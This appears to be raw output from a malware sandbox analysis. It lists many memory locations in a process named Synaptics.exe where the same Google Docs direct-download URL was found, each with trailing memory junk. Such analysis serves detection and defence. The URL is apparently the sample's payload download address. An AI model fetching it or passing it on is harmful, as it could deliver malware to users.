0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%S$
                            Source: Synaptics.exe, 00000007.00000003.1630718381.0000000000610000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%e
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%p
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%u
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.0000000005447000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&kn
                            Source: Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.0000000007099000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(Z
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)Ps$
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)m
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)r
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)w
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.0000000005447000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-B
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-B/L
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-BG20&r
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-BKL$$r
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Bze
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-R
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.c
                            Source: Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-src
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-v
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883242733.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.2mdD
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.:x$
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.amppy
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com.3
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.dv$
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.jp
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.moo
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.mx
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.net
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.net.
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.uW
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.~
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/Vi&;
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/b
                            Source: Synaptics.exe, 0000001A.00000003.1883469824.0000000004C90000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.000000000708A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download11
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1E
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1Q
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1S
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1p
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1u
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000710F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2412
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2kz
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.0000000005447000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883242733.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D0C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download33
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3:w$
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3lss
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.000000000708A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4V~&
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4c
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4d28T6
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5R
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5jw$a
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5s
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5t
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6j~&
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download72
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSUjUj;
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSZQIXM
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSan
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSecur
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadServ
                            Source: Synaptics.exe, 00000007.00000002.1750489889.000000000602E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1751132872.00000000068AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1755350539.000000000863E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1753799760.000000000827E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1752448573.000000000767E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1750594648.000000000616E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1754228757.00000000084FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1740103190.0000000004B1E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1751212444.00000000069EE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1753308146.0000000007EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1751388458.0000000006C6E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1739610883.00000000049BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1751302766.0000000006B2E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1752362906.000000000753E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1753494022.000000000813E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1751878252.0000000006EFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1751492697.0000000006DBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1739424419.000000000442E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1752601685.00000000078FE000.00000004.00000010.00020000.00000000.sdmp, 
Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1750181162.0000000005C6E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
